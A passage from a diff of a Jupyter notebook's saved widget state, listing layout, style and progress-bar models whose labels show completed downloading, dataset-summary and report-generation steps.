"1.5.0", + "_view_name": "HTMLView", + "description": "", + "description_tooltip": null, + "layout": "IPY_MODEL_ee5daed831c846579888db7cdb41f7e3", + "placeholder": "​", + "style": "IPY_MODEL_d0c43db386bb4448a24806a0714ccb17", + "value": "Job ID dcbd65ab-0a25-49b6-992c-8d5bcf2d7ee1 successfully executed: 100%" + } + }, + "c7f6a1a793f540f7b455e6e5c333e784": { + "model_module": "@jupyter-widgets/controls", + "model_name": "FloatProgressModel", + "model_module_version": "1.5.0", + "state": { + "_dom_classes": [], + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "FloatProgressModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/controls", + "_view_module_version": "1.5.0", + "_view_name": "ProgressView", + "bar_style": "success", + "description": "", + "description_tooltip": null, + "layout": "IPY_MODEL_928ef0f255144240a1b45fd3a194679b", + "max": 1, + "min": 0, + "orientation": "horizontal", + "style": "IPY_MODEL_f74ea56fe0d54fe796367e996d53dc07", + "value": 1 + } + }, + "dc26ec5c563e4d8894d2e8597326a451": { + "model_module": "@jupyter-widgets/controls", + "model_name": "HTMLModel", + "model_module_version": "1.5.0", + "state": { + "_dom_classes": [], + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "HTMLModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/controls", + "_view_module_version": "1.5.0", + "_view_name": "HTMLView", + "description": "", + "description_tooltip": null, + "layout": "IPY_MODEL_31921cdef333470eb225aea88a7394dc", + "placeholder": "​", + "style": "IPY_MODEL_d8f2e9832b6e45baa7b93905f717b586", + "value": "" + } + }, + "bfb1e9039ae14006b3ce1f52e37361c0": { + "model_module": "@jupyter-widgets/base", + "model_name": "LayoutModel", + "model_module_version": "1.2.0", + "state": { + "_model_module": "@jupyter-widgets/base", + "_model_module_version": "1.2.0", + "_model_name": "LayoutModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "LayoutView", + "align_content": null, + "align_items": null, + "align_self": null, + "border": null, + "bottom": null, + "display": null, + "flex": null, + "flex_flow": null, + "grid_area": null, + "grid_auto_columns": null, + "grid_auto_flow": null, + "grid_auto_rows": null, + "grid_column": null, + "grid_gap": null, + "grid_row": null, + "grid_template_areas": null, + "grid_template_columns": null, + "grid_template_rows": null, + "height": null, + "justify_content": null, + "justify_items": null, + "left": null, + "margin": null, + "max_height": null, + "max_width": null, + "min_height": null, + "min_width": null, + "object_fit": null, + "object_position": null, + "order": null, + "overflow": null, + "overflow_x": null, + "overflow_y": null, + "padding": null, + "right": null, + "top": null, + "visibility": null, + "width": null + } + }, + "ee5daed831c846579888db7cdb41f7e3": { + "model_module": "@jupyter-widgets/base", + "model_name": "LayoutModel", + "model_module_version": "1.2.0", + "state": { + "_model_module": "@jupyter-widgets/base", + "_model_module_version": "1.2.0", + "_model_name": "LayoutModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "LayoutView", + "align_content": null, + "align_items": null, + "align_self": null, + "border": null, + "bottom": null, + "display": null, + "flex": null, + "flex_flow": null, + "grid_area": null, + "grid_auto_columns": null, + "grid_auto_flow": null, + "grid_auto_rows": null, + "grid_column": null, + "grid_gap": null, + "grid_row": null, + "grid_template_areas": null, + "grid_template_columns": null, + "grid_template_rows": null, + "height": null, + "justify_content": null, + "justify_items": null, + "left": null, + "margin": null, + "max_height": null, + "max_width": null, + "min_height": null, + "min_width": null, + "object_fit": null, + "object_position": null, + "order": null, + "overflow": null, + "overflow_x": null, + "overflow_y": null, + "padding": null, + "right": null, + "top": null, + "visibility": null, + "width": null + } + }, + "d0c43db386bb4448a24806a0714ccb17": { + "model_module": "@jupyter-widgets/controls", + "model_name": "DescriptionStyleModel", + "model_module_version": "1.5.0", + "state": { + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "DescriptionStyleModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "StyleView", + "description_width": "" + } + }, + "928ef0f255144240a1b45fd3a194679b": { + "model_module": "@jupyter-widgets/base", + "model_name": "LayoutModel", + "model_module_version": "1.2.0", + "state": { + "_model_module": "@jupyter-widgets/base", + "_model_module_version": "1.2.0", + "_model_name": "LayoutModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "LayoutView", + "align_content": null, + "align_items": null, + "align_self": null, + "border": null, + "bottom": null, + "display": null, + "flex": null, + "flex_flow": null, + "grid_area": null, + "grid_auto_columns": null, + "grid_auto_flow": null, + "grid_auto_rows": null, + "grid_column": null, + "grid_gap": null, + "grid_row": null, + "grid_template_areas": null, + "grid_template_columns": null, + "grid_template_rows": null, + "height": null, + "justify_content": null, + "justify_items": null, + "left": null, + "margin": null, + "max_height": null, + "max_width": null, + "min_height": null, + "min_width": null, + "object_fit": null, + "object_position": null, + "order": null, + "overflow": null, + "overflow_x": null, + "overflow_y": null, + "padding": null, + "right": null, + "top": null, + "visibility": null, + "width": null + } + }, + "f74ea56fe0d54fe796367e996d53dc07": { + "model_module": "@jupyter-widgets/controls", + "model_name": "ProgressStyleModel", + "model_module_version": "1.5.0", + "state": { + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "ProgressStyleModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "StyleView", + "bar_color": null, + "description_width": "" + } + }, + "31921cdef333470eb225aea88a7394dc": { + "model_module": "@jupyter-widgets/base", + "model_name": "LayoutModel", + "model_module_version": "1.2.0", + "state": { + "_model_module": "@jupyter-widgets/base", + "_model_module_version": "1.2.0", + "_model_name": "LayoutModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "LayoutView", + "align_content": null, + "align_items": null, + "align_self": null, + "border": null, + "bottom": null, + "display": null, + "flex": null, + "flex_flow": null, + "grid_area": null, + "grid_auto_columns": null, + "grid_auto_flow": null, + "grid_auto_rows": null, + "grid_column": null, + "grid_gap": null, + "grid_row": null, + "grid_template_areas": null, + "grid_template_columns": null, + "grid_template_rows": null, + "height": null, + "justify_content": null, + "justify_items": null, + "left": null, + "margin": null, + "max_height": null, + "max_width": null, + "min_height": null, + "min_width": null, + "object_fit": null, + "object_position": null, + "order": null, + "overflow": null, + "overflow_x": null, + "overflow_y": null, + "padding": null, + "right": null, + "top": null, + "visibility": null, + "width": null + } + }, + "d8f2e9832b6e45baa7b93905f717b586": { + "model_module": "@jupyter-widgets/controls", + "model_name": "DescriptionStyleModel", + "model_module_version": "1.5.0", + "state": { + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "DescriptionStyleModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "StyleView", + "description_width": "" + } + }, + "eb2bf24f7c0e40bda34c4ad6ae7f4846": { + "model_module": "@jupyter-widgets/controls", + "model_name": "HBoxModel", + "model_module_version": "1.5.0", + "state": { + "_dom_classes": [], + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "HBoxModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/controls", + "_view_module_version": "1.5.0", + "_view_name": "HBoxView", + "box_style": "", + "children": [ + "IPY_MODEL_5fb2b8eb975e4bcaa4b006ab4d2666ad", + "IPY_MODEL_0d045ce66ac748f39b128dbb07d244ac", + "IPY_MODEL_8c61a995c73042869b1c8ce078243b1f" + ], + "layout": "IPY_MODEL_f74ee834aea648e88643a05dd42f0335" + } + }, + "5fb2b8eb975e4bcaa4b006ab4d2666ad": { + "model_module": "@jupyter-widgets/controls", + "model_name": "HTMLModel", + "model_module_version": "1.5.0", + "state": { + "_dom_classes": [], + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "HTMLModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/controls", + "_view_module_version": "1.5.0", + "_view_name": "HTMLView", + "description": "", + "description_tooltip": null, + "layout": "IPY_MODEL_6fe1fe4e25ad43f1bc8835e98cca60d2", + "placeholder": "​", + "style": "IPY_MODEL_542b7e2ead0f43019751a18d171b1da3", + "value": "Downloading: 100%" + } + }, + "0d045ce66ac748f39b128dbb07d244ac": { + "model_module": "@jupyter-widgets/controls", + "model_name": "FloatProgressModel", + "model_module_version": "1.5.0", + "state": { + "_dom_classes": [], + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "FloatProgressModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/controls", + "_view_module_version": "1.5.0", + "_view_name": "ProgressView", + "bar_style": "success", + "description": "", + "description_tooltip": null, + "layout": "IPY_MODEL_832c5afe0b1642dbae94c245f46d7616", + "max": 43671, + "min": 0, + "orientation": "horizontal", + "style": "IPY_MODEL_5105210c3e6b4bda8c1c09a25036dc13", + "value": 43671 + } + }, + "8c61a995c73042869b1c8ce078243b1f": { + "model_module": "@jupyter-widgets/controls", + "model_name": "HTMLModel", + "model_module_version": "1.5.0", + "state": { + "_dom_classes": [], + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "HTMLModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/controls", + "_view_module_version": "1.5.0", + "_view_name": "HTMLView", + "description": "", + "description_tooltip": null, + "layout": "IPY_MODEL_0f551e74aa334c1ebde5254c5041ed68", + "placeholder": "​", + "style": "IPY_MODEL_0fc48fa623064b1cbc1f929d3e2dab5e", + "value": "" + } + }, + "f74ee834aea648e88643a05dd42f0335": { + "model_module": "@jupyter-widgets/base", + "model_name": "LayoutModel", + "model_module_version": "1.2.0", + "state": { + "_model_module": "@jupyter-widgets/base", + "_model_module_version": "1.2.0", + "_model_name": "LayoutModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "LayoutView", + "align_content": null, + "align_items": null, + "align_self": null, + "border": null, + "bottom": null, + "display": null, + "flex": null, + "flex_flow": null, + "grid_area": null, + "grid_auto_columns": null, + "grid_auto_flow": null, + "grid_auto_rows": null, + "grid_column": null, + "grid_gap": null, + "grid_row": null, + "grid_template_areas": null, + "grid_template_columns": null, + "grid_template_rows": null, + "height": null, + "justify_content": null, + "justify_items": null, + "left": null, + "margin": null, + "max_height": null, + "max_width": null, + "min_height": null, + "min_width": null, + "object_fit": null, + "object_position": null, + "order": null, + "overflow": null, + "overflow_x": null, + "overflow_y": null, + "padding": null, + "right": null, + "top": null, + "visibility": null, + "width": null + } + }, + "6fe1fe4e25ad43f1bc8835e98cca60d2": { + "model_module": "@jupyter-widgets/base", + "model_name": "LayoutModel", + "model_module_version": "1.2.0", + "state": { + "_model_module": "@jupyter-widgets/base", + "_model_module_version": "1.2.0", + "_model_name": "LayoutModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "LayoutView", + "align_content": null, + "align_items": null, + "align_self": null, + "border": null, + "bottom": null, + "display": null, + "flex": null, + "flex_flow": null, + "grid_area": null, + "grid_auto_columns": null, + "grid_auto_flow": null, + "grid_auto_rows": null, + "grid_column": null, + "grid_gap": null, + "grid_row": null, + "grid_template_areas": null, + "grid_template_columns": null, + "grid_template_rows": null, + "height": null, + "justify_content": null, + "justify_items": null, + "left": null, + "margin": null, + "max_height": null, + "max_width": null, + "min_height": null, + "min_width": null, + "object_fit": null, + "object_position": null, + "order": null, + "overflow": null, + "overflow_x": null, + "overflow_y": null, + "padding": null, + "right": null, + "top": null, + "visibility": null, + "width": null + } + }, + "542b7e2ead0f43019751a18d171b1da3": { + "model_module": "@jupyter-widgets/controls", + "model_name": "DescriptionStyleModel", + "model_module_version": "1.5.0", + "state": { + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "DescriptionStyleModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "StyleView", + "description_width": "" + } + }, + "832c5afe0b1642dbae94c245f46d7616": { + "model_module": "@jupyter-widgets/base", + "model_name": "LayoutModel", + "model_module_version": "1.2.0", + "state": { + "_model_module": "@jupyter-widgets/base", + "_model_module_version": "1.2.0", + "_model_name": "LayoutModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "LayoutView", + "align_content": null, + "align_items": null, + "align_self": null, + "border": null, + "bottom": null, + "display": null, + "flex": null, + "flex_flow": null, + "grid_area": null, + "grid_auto_columns": null, + "grid_auto_flow": null, + "grid_auto_rows": null, + "grid_column": null, + "grid_gap": null, + "grid_row": null, + "grid_template_areas": null, + "grid_template_columns": null, + "grid_template_rows": null, + "height": null, + "justify_content": null, + "justify_items": null, + "left": null, + "margin": null, + "max_height": null, + "max_width": null, + "min_height": null, + "min_width": null, + "object_fit": null, + "object_position": null, + "order": null, + "overflow": null, + "overflow_x": null, + "overflow_y": null, + "padding": null, + "right": null, + "top": null, + "visibility": null, + "width": null + } + }, + "5105210c3e6b4bda8c1c09a25036dc13": { + "model_module": "@jupyter-widgets/controls", + "model_name": "ProgressStyleModel", + "model_module_version": "1.5.0", + "state": { + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "ProgressStyleModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "StyleView", + "bar_color": null, + "description_width": "" + } + }, + "0f551e74aa334c1ebde5254c5041ed68": { + "model_module": "@jupyter-widgets/base", + "model_name": "LayoutModel", + "model_module_version": "1.2.0", + "state": { + "_model_module": "@jupyter-widgets/base", + "_model_module_version": "1.2.0", + "_model_name": "LayoutModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "LayoutView", + "align_content": null, + "align_items": null, + "align_self": null, + "border": null, + "bottom": null, + "display": null, + "flex": null, + "flex_flow": null, + "grid_area": null, + "grid_auto_columns": null, + "grid_auto_flow": null, + "grid_auto_rows": null, + "grid_column": null, + "grid_gap": null, + "grid_row": null, + "grid_template_areas": null, + "grid_template_columns": null, + "grid_template_rows": null, + "height": null, + "justify_content": null, + "justify_items": null, + "left": null, + "margin": null, + "max_height": null, + "max_width": null, + "min_height": null, + "min_width": null, + "object_fit": null, + "object_position": null, + "order": null, + "overflow": null, + "overflow_x": null, + "overflow_y": null, + "padding": null, + "right": null, + "top": null, + "visibility": null, + "width": null + } + }, + "0fc48fa623064b1cbc1f929d3e2dab5e": { + "model_module": "@jupyter-widgets/controls", + "model_name": "DescriptionStyleModel", + "model_module_version": "1.5.0", + "state": { + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "DescriptionStyleModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "StyleView", + "description_width": "" + } + }, + "e87812f5a898469bb2bad220a6e91566": { + "model_module": "@jupyter-widgets/controls", + "model_name": "HBoxModel", + "model_module_version": "1.5.0", + "state": { + "_dom_classes": [], + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "HBoxModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/controls", + "_view_module_version": "1.5.0", + "_view_name": "HBoxView", + "box_style": "", + "children": [ + "IPY_MODEL_5340a286a5c64ae18446fa1c7510715e", + "IPY_MODEL_683df473a75d436e82b07a3169bfd64c", + "IPY_MODEL_05d27b17d2c245ca832a0e9fb175c62b" + ], + "layout": "IPY_MODEL_3cd8c61bb49a43f3b0978837ef9a61bd" + } + }, + "5340a286a5c64ae18446fa1c7510715e": { + "model_module": "@jupyter-widgets/controls", + "model_name": "HTMLModel", + "model_module_version": "1.5.0", + "state": { + "_dom_classes": [], + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "HTMLModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/controls", + "_view_module_version": "1.5.0", + "_view_name": "HTMLView", + "description": "", + "description_tooltip": null, + "layout": "IPY_MODEL_e617ffc8fe64453794e00ff383adfd49", + "placeholder": "​", + "style": "IPY_MODEL_58117e02cbbe4013899717d9149cadbc", + "value": "Summarize dataset: 100%" + } + }, + "683df473a75d436e82b07a3169bfd64c": { + "model_module": "@jupyter-widgets/controls", + "model_name": "FloatProgressModel", + "model_module_version": "1.5.0", + "state": { + "_dom_classes": [], + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "FloatProgressModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/controls", + "_view_module_version": "1.5.0", + "_view_name": "ProgressView", + "bar_style": "success", + "description": "", + "description_tooltip": null, + "layout": "IPY_MODEL_ca7d018d03b349109625155ce8565556", + "max": 5, + "min": 0, + "orientation": "horizontal", + "style": "IPY_MODEL_997d2eb93bc947eb915dfc965c27387e", + "value": 5 + } + }, + "05d27b17d2c245ca832a0e9fb175c62b": { + "model_module": "@jupyter-widgets/controls", + "model_name": "HTMLModel", + "model_module_version": "1.5.0", + "state": { + "_dom_classes": [], + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "HTMLModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/controls", + "_view_module_version": "1.5.0", + "_view_name": "HTMLView", + "description": "", + "description_tooltip": null, + "layout": "IPY_MODEL_f151ebf67d20449a953acbde1cf6459f", + "placeholder": "​", + "style": "IPY_MODEL_5e667a61dcae4b8db4d9f1aeb3903161", + "value": " 82/82 [00:14<00:00,  4.32it/s, Completed]" + } + }, + "3cd8c61bb49a43f3b0978837ef9a61bd": { + "model_module": "@jupyter-widgets/base", + "model_name": "LayoutModel", + "model_module_version": "1.2.0", + "state": { + "_model_module": "@jupyter-widgets/base", + "_model_module_version": "1.2.0", + "_model_name": "LayoutModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "LayoutView", + "align_content": null, + "align_items": null, + "align_self": null, + "border": null, + "bottom": null, + "display": null, + "flex": null, + "flex_flow": null, + "grid_area": null, + "grid_auto_columns": null, + "grid_auto_flow": null, + "grid_auto_rows": null, + "grid_column": null, + "grid_gap": null, + "grid_row": null, + "grid_template_areas": null, + "grid_template_columns": null, + "grid_template_rows": null, + "height": null, + "justify_content": null, + "justify_items": null, + "left": null, + "margin": null, + "max_height": null, + "max_width": null, + "min_height": null, + "min_width": null, + "object_fit": null, + "object_position": null, + "order": null, + "overflow": null, + "overflow_x": null, + "overflow_y": null, + "padding": null, + "right": null, + "top": null, + "visibility": null, + "width": null + } + }, + "e617ffc8fe64453794e00ff383adfd49": { + "model_module": "@jupyter-widgets/base", + "model_name": "LayoutModel", + "model_module_version": "1.2.0", + "state": { + "_model_module": "@jupyter-widgets/base", + "_model_module_version": "1.2.0", + "_model_name": "LayoutModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "LayoutView", + "align_content": null, + "align_items": null, + "align_self": null, + "border": null, + "bottom": null, + "display": null, + "flex": null, + "flex_flow": null, + "grid_area": null, + "grid_auto_columns": null, + "grid_auto_flow": null, + "grid_auto_rows": null, + "grid_column": null, + "grid_gap": null, + "grid_row": null, + "grid_template_areas": null, + "grid_template_columns": null, + "grid_template_rows": null, + "height": null, + "justify_content": null, + "justify_items": null, + "left": null, + "margin": null, + "max_height": null, + "max_width": null, + "min_height": null, + "min_width": null, + "object_fit": null, + "object_position": null, + "order": null, + "overflow": null, + "overflow_x": null, + "overflow_y": null, + "padding": null, + "right": null, + "top": null, + "visibility": null, + "width": null + } + }, + "58117e02cbbe4013899717d9149cadbc": { + "model_module": "@jupyter-widgets/controls", + "model_name": "DescriptionStyleModel", + "model_module_version": "1.5.0", + "state": { + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "DescriptionStyleModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "StyleView", + "description_width": "" + } + }, + "ca7d018d03b349109625155ce8565556": { + "model_module": "@jupyter-widgets/base", + "model_name": "LayoutModel", + "model_module_version": "1.2.0", + "state": { + "_model_module": "@jupyter-widgets/base", + "_model_module_version": "1.2.0", + "_model_name": "LayoutModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "LayoutView", + "align_content": null, + "align_items": null, + "align_self": null, + "border": null, + "bottom": null, + "display": null, + "flex": null, + "flex_flow": null, + "grid_area": null, + "grid_auto_columns": null, + "grid_auto_flow": null, + "grid_auto_rows": null, + "grid_column": null, + "grid_gap": null, + "grid_row": null, + "grid_template_areas": null, + "grid_template_columns": null, + "grid_template_rows": null, + "height": null, + "justify_content": null, + "justify_items": null, + "left": null, + "margin": null, + "max_height": null, + "max_width": null, + "min_height": null, + "min_width": null, + "object_fit": null, + "object_position": null, + "order": null, + "overflow": null, + "overflow_x": null, + "overflow_y": null, + "padding": null, + "right": null, + "top": null, + "visibility": null, + "width": null + } + }, + "997d2eb93bc947eb915dfc965c27387e": { + "model_module": "@jupyter-widgets/controls", + "model_name": "ProgressStyleModel", + "model_module_version": "1.5.0", + "state": { + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "ProgressStyleModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "StyleView", + "bar_color": null, + "description_width": "" + } + }, + "f151ebf67d20449a953acbde1cf6459f": { + "model_module": "@jupyter-widgets/base", + "model_name": "LayoutModel", + "model_module_version": "1.2.0", + "state": { + "_model_module": "@jupyter-widgets/base", + "_model_module_version": "1.2.0", + "_model_name": "LayoutModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "LayoutView", + "align_content": null, + "align_items": null, + "align_self": null, + "border": null, + "bottom": null, + "display": null, + "flex": null, + "flex_flow": null, + "grid_area": null, + "grid_auto_columns": null, + "grid_auto_flow": null, + "grid_auto_rows": null, + "grid_column": null, + "grid_gap": null, + "grid_row": null, + "grid_template_areas": null, + "grid_template_columns": null, + "grid_template_rows": null, + "height": null, + "justify_content": null, + "justify_items": null, + "left": null, + "margin": null, + "max_height": null, + "max_width": null, + "min_height": null, + "min_width": null, + "object_fit": null, + "object_position": null, + "order": null, + "overflow": null, + "overflow_x": null, + "overflow_y": null, + "padding": null, + "right": null, + "top": null, + "visibility": null, + "width": null + } + }, + "5e667a61dcae4b8db4d9f1aeb3903161": { + "model_module": "@jupyter-widgets/controls", + "model_name": "DescriptionStyleModel", + "model_module_version": "1.5.0", + "state": { + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "DescriptionStyleModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "StyleView", + "description_width": "" + } + }, + "a084bafb25c94e6997ba2f4da9db1819": { + "model_module": "@jupyter-widgets/controls", + "model_name": "HBoxModel", + "model_module_version": "1.5.0", + "state": { + "_dom_classes": [], + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "HBoxModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/controls", + "_view_module_version": "1.5.0", + "_view_name": "HBoxView", + "box_style": "", + "children": [ + "IPY_MODEL_23417e1e02b746599ab7cbed74052e14", + "IPY_MODEL_49540d8b789341a0a0ae2749bf93de1d", + "IPY_MODEL_355ee7238d914eeeaa1cdf62ef2ab176" + ], + "layout": "IPY_MODEL_8d32e8bfc0f6412fb2c78c3293010dbe" + } + }, + "23417e1e02b746599ab7cbed74052e14": { + "model_module": "@jupyter-widgets/controls", + "model_name": "HTMLModel", + "model_module_version": "1.5.0", + "state": { + "_dom_classes": [], + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "HTMLModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/controls", + "_view_module_version": "1.5.0", + "_view_name": "HTMLView", + "description": "", + "description_tooltip": null, + "layout": "IPY_MODEL_4a056b5aadf94bba97a5769dfacb551a", + "placeholder": "​", + "style": "IPY_MODEL_685e8e59c01f42388be05608248ed424", + "value": "Generate report structure: 100%" + } + }, + "49540d8b789341a0a0ae2749bf93de1d": { + "model_module": "@jupyter-widgets/controls", + "model_name": "FloatProgressModel", + "model_module_version": "1.5.0", + "state": { + "_dom_classes": [], + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "FloatProgressModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/controls", + "_view_module_version": "1.5.0", + "_view_name": "ProgressView", + "bar_style": "success", + "description": "", + "description_tooltip": null, + "layout": "IPY_MODEL_04aa8a778e1047a3b1ea78144f646f0c", + "max": 1, + "min": 0, + "orientation": "horizontal", + "style": "IPY_MODEL_1c2bbe06d9464626bfa1b5bc84db4ab3", + "value": 1 + } + }, + "355ee7238d914eeeaa1cdf62ef2ab176": { + "model_module": "@jupyter-widgets/controls", + "model_name": "HTMLModel", + "model_module_version": "1.5.0", + "state": { + "_dom_classes": [], + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "HTMLModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/controls", + "_view_module_version": "1.5.0", + "_view_name": "HTMLView", + "description": "", + "description_tooltip": null, + "layout": "IPY_MODEL_f0a889f2b51f464cab9f3308e3b63121", + "placeholder": "​", + "style": "IPY_MODEL_a26e9a47d91348d3b105772edeac5630", + "value": " 1/1 [00:03<00:00,  3.28s/it]" + } + }, + "8d32e8bfc0f6412fb2c78c3293010dbe": { + "model_module": "@jupyter-widgets/base", + "model_name": "LayoutModel", + "model_module_version": "1.2.0", + "state": { + "_model_module": "@jupyter-widgets/base", + "_model_module_version": "1.2.0", + "_model_name": "LayoutModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "LayoutView", + "align_content": null, + "align_items": null, + "align_self": null, + "border": null, + "bottom": null, + "display": null, + "flex": null, + "flex_flow": null, + "grid_area": null, + "grid_auto_columns": null, + "grid_auto_flow": null, + "grid_auto_rows": null, + "grid_column": null, + "grid_gap": null, + "grid_row": null, + "grid_template_areas": null, + "grid_template_columns": null, + "grid_template_rows": null, + "height": null, + "justify_content": null, + "justify_items": null, + "left": null, + "margin": null, + "max_height": null, + "max_width": null, + "min_height": null, + "min_width": null, + "object_fit": null, + "object_position": null, + "order": null, + "overflow": null, + "overflow_x": null, + "overflow_y": null, + "padding": null, + "right": null, + "top": null, + "visibility": null, + "width": null + } + }, + "4a056b5aadf94bba97a5769dfacb551a": { + "model_module": "@jupyter-widgets/base", + "model_name": "LayoutModel", + "model_module_version": "1.2.0", + "state": { + "_model_module": "@jupyter-widgets/base", + "_model_module_version": "1.2.0", + "_model_name": "LayoutModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "LayoutView", + "align_content": null, + "align_items": null, + "align_self": null, + "border": null, + "bottom": null, + "display": null, + "flex": null, + "flex_flow": null, + "grid_area": null, + "grid_auto_columns": null, + "grid_auto_flow": null, + "grid_auto_rows": null, + "grid_column": null, + "grid_gap": null, + "grid_row": null, + "grid_template_areas": null, + "grid_template_columns": null, + "grid_template_rows": null, + "height": null, + "justify_content": null, + "justify_items": null, + "left": null, + "margin": null, + "max_height": null, + "max_width": null, + "min_height": null, + "min_width": null, + "object_fit": null, + "object_position": null, + "order": null, + "overflow": null, + "overflow_x": null, + "overflow_y": null, + "padding": null, + "right": null, + "top": null, + "visibility": null, + "width": null + } + }, + "685e8e59c01f42388be05608248ed424": { + "model_module": "@jupyter-widgets/controls", + "model_name": "DescriptionStyleModel", + "model_module_version": "1.5.0", + "state": { + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "DescriptionStyleModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "StyleView", + "description_width": "" + } + }, + "04aa8a778e1047a3b1ea78144f646f0c": { + "model_module": "@jupyter-widgets/base", + "model_name": "LayoutModel", + "model_module_version": "1.2.0", + "state": { + "_model_module": "@jupyter-widgets/base", + "_model_module_version": "1.2.0", + "_model_name": "LayoutModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "LayoutView", + "align_content": null, + "align_items": null, + "align_self": null, + "border": null, + "bottom": null, + "display": null, + "flex": null, + "flex_flow": null, + "grid_area": null, + "grid_auto_columns": null, + "grid_auto_flow": null, + "grid_auto_rows": null, + "grid_column": null, + "grid_gap": null, + "grid_row": null, + "grid_template_areas": null, + "grid_template_columns": null, + "grid_template_rows": null, + "height": null, + "justify_content": null, + "justify_items": null, + "left": null, + "margin": null, + "max_height": null, + "max_width": null, + "min_height": null, + "min_width": null, + "object_fit": null, + "object_position": null, + "order": null, + "overflow": null, + "overflow_x": null, + "overflow_y": null, + "padding": null, + "right": null, + "top": null, + "visibility": null, + "width": null + } + }, + "1c2bbe06d9464626bfa1b5bc84db4ab3": { + "model_module": "@jupyter-widgets/controls", + "model_name": "ProgressStyleModel", + "model_module_version": "1.5.0", + "state": { + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "ProgressStyleModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "StyleView", + "bar_color": 